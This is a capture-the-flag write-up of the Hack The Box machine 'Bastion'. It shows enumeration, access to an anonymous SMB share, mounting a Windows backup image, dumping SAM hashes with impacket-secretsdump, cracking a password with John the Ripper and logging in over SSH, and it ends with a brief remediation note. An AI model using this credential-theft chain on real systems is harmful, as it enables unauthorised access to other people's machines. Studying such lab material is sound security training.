Bastion
Difficulty: Easy
Operating System: Windows
IP Address: 10.10.10.134
Exploit: Anonymous Authentication to SMB share
Escalation:
Enumeration
As normal, let’s check if it responds to ICMP with ping:
┌──(root💀bradman)-[~/HTB/Bastion]
└─# ping -c 4 10.10.10.134
PING 10.10.10.134 (10.10.10.134) 56(84) bytes of data.
64 bytes from 10.10.10.134: icmp_seq=1 ttl=127 time=932 ms
64 bytes from 10.10.10.134: icmp_seq=2 ttl=127 time=609 ms
64 bytes from 10.10.10.134: icmp_seq=3 ttl=127 time=582 ms
64 bytes from 10.10.10.134: icmp_seq=4 ttl=127 time=371 ms
--- 10.10.10.134 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3000ms
rtt min/avg/max/mdev = 371.292/623.625/931.939/200.416 ms
First things first, we can actually make a pretty reasonable guess that this is a Windows machine just from ping! Look at the ttl - it’s 127, cross checking with default TTL for different operating systems at subinsb.com we can clearly see that 128 which typically indicates it’s a Windows machine (yeah, it’s not 128 but it’s close… we can guess off-by-one is from a myriad of things… we’ll just round ;) ).
Let’s enumerate further and do an nmap scan. Personally, when I’m working on a machine I tend to do the same nmap commands over and over again but with different IP… so I wrote a super-duper basic script nmapper (and getports) which executes the nmap commands I typically like for me. nmapper takes in a target IP and a directory to store the results.
nmapper
#!/bin/bash
# This is my typical strategy for scanning boxes I'm pentesting.
# I find this generally gives me all the information I need.
if [ $# -lt 2 ]; then
echo "Usage: #0 <ipaddress> <outfile>"
exit 1
fi
TARGET=$1
OUTFILE=$2
echo "####################"
echo "# ----- FAST ----- #"
echo "####################"
nmap -Pn -F $TARGET -o $OUTFILE.fast
echo ""
echo "#####################"
echo "# ----- NORMAL -----#"
echo "#####################"
nmap -Pn $TARGET -o $OUTFILE.normal
echo ""
echo "###################"
echo "# ----- ALL ----- #"
echo "###################"
nmap -Pn -p- --max-retries 1 $TARGET -o $OUTFILE.all -v
echo ""
PORTS=$(get_ports $OUTFILE.all)
echo "#######################"
echo "# ----- ALL sVsC -----#"
echo "#######################"
nmap -Pn -sV -sC -p $PORTS $TARGET -oA $OUTFILE.all.sVsC
echo ""
echo "Done."
## get_ports
#!/bin/bash
# Needs work but.... maybe later ;)
if [ $# -lt 1 ]; then
echo "Usage: $0 <file>"
exit 1
fi
grep -e "open" -e "/tcp filtered" $1 | cut -d"/" -f1 | paste -sd,
Okay, enough with that, let’s actually get down to business. Running nmapper reveals the following:
┌──(root💀bradman)-[~/HTB/Bastion]
└─# nmapper 10.10.10.134 nmap/bastion
####################
# ----- FAST ----- #
####################
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-14 22:54 CDT
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 67.67% done; ETC: 22:54 (0:00:02 remaining)
Nmap scan report for 10.10.10.134
Host is up (0.25s latency).
Not shown: 96 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
#####################
# ----- NORMAL -----#
#####################
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-14 22:54 CDT
Nmap scan report for 10.10.10.134
Host is up (0.071s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 70.57 seconds
###################
# ----- ALL ----- #
###################
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-14 22:55 CDT
Nmap scan report for 10.10.10.134
Host is up (0.099s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 30.50 seconds
#######################
# ----- ALL sVsC -----#
#######################
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-14 22:56 CDT
Nmap scan report for 10.10.10.134
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -34m38s, deviation: 1h09m14s, median: 5m19s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-15T06:02:24+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-15T04:02:22
|_ start_date: 2021-07-14T03:17:50
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.85 seconds
Done.
Think we got enough information? :)
Well, we should be able to make a damn good guess that this sucker is a Windows machine! If we look at the Vuln section of our script, we can see that smb on port 445 actually allows guest level access. Let’s see what we can see.
┌──(root💀bradman)-[~/HTB/Bastion]
└─# smbclient -L //10.10.10.134 -U anonymous
Enter WORKGROUP\anonymous's password:
Sharename Type Comment
--------- ---- -------
ADMIN# Disk Remote Admin
Backups Disk
C# Disk Default share
IPC# IPC Remote IPC
SMB1 disabled -- no workgroup available
So I’m using smbclient in order to query the share (this auto targets port 445). I’m using the -L flag to “list” the shares and I’m using the -U flag to specify what user I want to make this connection as. In this case, “anonymous”. It prompts for a password… but it really doesn’t matter what you type, it’ll still list the shares.
I’ve never had much luck with shares that end with “#” - prolly because I don’t know enough about smb :) buuuut we have a share called “Backups”, let’s see if we can connect to it.
┌──(root💀bradman)-[~/HTB/Bastion]
└─# smbclient //10.10.10.134/Backups -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 14 21:40:56 2021
.. D 0 Wed Jul 14 21:40:56 2021
note.txt AR 116 Tue Apr 16 05:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 06:43:08 2019
WindowsImageBackup D 0 Fri Feb 22 06:44:02 2019
7735807 blocks of size 4096. 2756074 blocks available
smb: \>
Exploitation
Neat! It has a handful of interesting things on it. Since we know we can access this with no real credentials, let’s go ahead and just mount this to our local system so we can navigate a little bit more cleanly than with smb’s console.
┌──(root💀bradman)-[~/HTB/Bastion]
└─# mkdir /mnt/share
┌──(root💀bradman)-[~/HTB/Bastion]
└─# mount -t cifs //10.10.10.134/Backups /mnt/share
Password for root@//10.10.10.134/Backups:
┌──(root💀bradman)-[~/HTB/Bastion]
└─# ls -al /mnt/share
total 8249
drwxr-xr-x 2 root root 4096 Jul 14 21:40 .
drwxr-xr-x 4 root root 4096 Jul 14 21:55 ..
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
drwxr-xr-x 2 root root 0 Feb 22 2019 WindowsImageBackup
Okay, let’s walk through this. First, I created a directory in the /mnt folder called “share”. Name this whatever you want. Next, I mounted the share (in order to do this you need to ensure you have the cifs, if you don’t have this, run ` apt install cifs-utils). Once the share is mounted, we can just go to /mnt/share` and view the files as though the files are actually on our machine!
Let’s look around and see what this sucker’s got!
┌──(root💀bradman)-[/mnt/share]
└─# ls -al *
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
WindowsImageBackup:
total 4
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Jul 14 21:40 ..
drwxr-xr-x 2 root root 0 Feb 22 2019 L4mpje-PC
┌──(root💀bradman)-[/mnt/share]
└─# cd WindowsImageBackup/L4mpje-PC
┌──(root💀bradman)-[/mnt/share/WindowsImageBackup/L4mpje-PC]
└─# ls -al *
-rwxr-xr-x 1 root root 16 Feb 22 2019 MediaId
'Backup 2019-02-22 124351':
total 5330564
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Feb 22 2019 ..
-rwxr-xr-x 1 root root 37761024 Feb 22 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd # PSSSST - this is what we're looking for ;)
-rwxr-xr-x 1 root root 1186 Feb 22 2019 BackupSpecs.xml
-rwxr-xr-x 1 root root 1078 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root 8930 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root 6542 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root 2894 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root 1488 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root 1484 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root 3844 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root 3988 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root 7110 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root 2374620 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
Catalog:
total 20
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Feb 22 2019 ..
-rwxr-xr-x 1 root root 5698 Feb 22 2019 BackupGlobalCatalog
-rwxr-xr-x 1 root root 7440 Feb 22 2019 GlobalCatalog
SPPMetadataCache:
total 64
drwxr-xr-x 2 root root 0 Feb 22 2019 .
drwxr-xr-x 2 root root 4096 Feb 22 2019 ..
-rwxr-xr-x 1 root root 57848 Feb 22 2019 {cd113385-65ff-4ea2-8ced-5630f6feca8f}
Aaaaalllll right… got a big chunk of information here and it’s difficult to parse through. I suggest looking through this and seeing what you can find on your own, but we found a few backup .vhd files… that’s actually what we’re wanting. This is actually a backup image of the OS at some point, we can actually mount this backup image and look through the file system from whenever this backup image was taken.
┌──(root💀bradman)-[~/HTB/Bastion]
└─# mkdir /mnt/vhd
┌──(root💀bradman)-[~/HTB/Bastion]
└─# guestmount --add /mnt/share/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro -v /mnt/vhd
libguestfs: creating COW overlay to protect original drive content
libguestfs: command: run: qemu-img
<-- Omit because it's a LOT of information -->
I totally have that command memorized and definitely never have to google it…… anyway… this takes a while to run but once it’s finished, we can navigate to /mnt/vhd and explore the file system!
┌──(root💀bradman)-[/mnt]
└─# ls -al
ls: cannot access 'vhd': Permission denied
total 12
drwxr-xr-x 4 root root 4096 Jul 14 23:13 .
drwxr-xr-x 20 root root 4096 Sep 9 2020 ..
drwxr-xr-x 2 root root 4096 Jul 14 21:40 share
d????????? ? ? ? ? ? vhd
┌──(root💀bradman)-[/mnt]
└─# cd vhd
┌──(root💀bradman)-[/mnt/vhd]
└─# ls -al
total 2096745
drwxrwxrwx 1 root root 12288 Feb 22 2019 .
drwxr-xr-x 4 root root 4096 Jul 14 23:13 ..
drwxrwxrwx 1 root root 0 Feb 22 2019 '#Recycle.Bin'
-rwxrwxrwx 1 root root 24 Jun 10 2009 autoexec.bat
-rwxrwxrwx 1 root root 10 Jun 10 2009 config.sys
lrwxrwxrwx 2 root root 14 Jul 13 2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22 2019 pagefile.sys
drwxrwxrwx 1 root root 0 Jul 13 2009 PerfLogs
drwxrwxrwx 1 root root 4096 Jul 13 2009 ProgramData
drwxrwxrwx 1 root root 4096 Apr 11 2011 'Program Files'
drwxrwxrwx 1 root root 0 Feb 22 2019 Recovery
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
drwxrwxrwx 1 root root 4096 Feb 22 2019 Users
drwxrwxrwx 1 root root 16384 Feb 22 2019 Windows
There is potentially a LOT we want to read in here, since we see Windows it’d prolly be a good idea to see if we can’t read the SAM database.
┌──(root💀bradman)-[/mnt/vhd]
└─# cd Windows/System32/config
┌──(root💀bradman)-[/mnt/vhd/Windows/System32/config]
└─# ls
<-- Omit-->
SAM
SAM.LOG
SAM.LOG1
SAM.LOG2
<-- Omit -->
SYSTEM
SYSTEM.LOG
SYSTEM.LOG1
SYSTEM.LOG2
<-- Omit -->
┌──(root💀bradman)-[/mnt/vhd/Windows/System32/config]
└─# cp SAM SYSTEM /home/brad/HTB/Bastion/
┌──(root💀bradman)-[/mnt/vhd/Windows/System32/config]
└─# cd /home/brad/HTB/Bastion
┌──(root💀bradman)-[/home/brad/HTB/Bastion]
└─# ls
nmap SAM sploit.exe SYSTEM
┌──(root💀bradman)-[/home/brad/HTB/Bastion]
└─# impacket-secretsdump -sam SAM -system SYSTEM local 1 ⨯
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
ooooooh snap! So let’s stop and look at what TF I just did. So I was able to see the SAM and SYSTEM files. I copied these over to my local directory for this machine and then utilized the impacket-secretsdump tool in order to actually extract password hashes! Let’s pass these into John-The-Ripper and see if we can find the actual password values!
┌──(root💀bradman)-[/home/brad/HTB/Bastion]
└─# sudo john --format=NT --wordlist=/home/brad/tools/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Remaining 1 password hash
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje (L4mpje)
1g 0:00:00:00 DONE (2021-07-14 23:49) 1.515g/s 14235Kp/s 14235Kc/s 14235KC/s burg7448..burdwan
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
┌──(root💀bradman)-[/home/brad/HTB/Bastion]
└─# sudo john --show --format=NT hash.txt
Administrator::500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
3 password hashes cracked, 0 left
Okay! We got the password for L4mpje (L4mpje:bureaulampje)…. Let’s see if we can get a SSH shell with these creds.
┌──(root💀bradman)-[/home/brad/HTB/Bastion]
└─# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>ipconfig
Windows IP
Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::6590:510d:8f1e:829e
Link-local IPv6 Address . . . . . : fe80::6590:510d:8f1e:829e%4
IPv4 Address. . . . . . . . . . . : 10.10.10.134
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c9be%4
10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
l4mpje@BASTION C:\Users\L4mpje>
hacker voice We’re in!!!
Escalation
WIP :) - basically, I’m not actually any good at windows privesc so this sucker takes me a hot minute to figure out! But I’m getting better.
Vulnerability Fix
So the actual vulnerability was that SMB was open and allowed anonymous connections without a real password. First and foremost - if you don’t need a port/service running then turn them off. If that’s not an option, then update the configuration such that a strong password is required and anonymous authentication isn’t enabled.
tags: HTB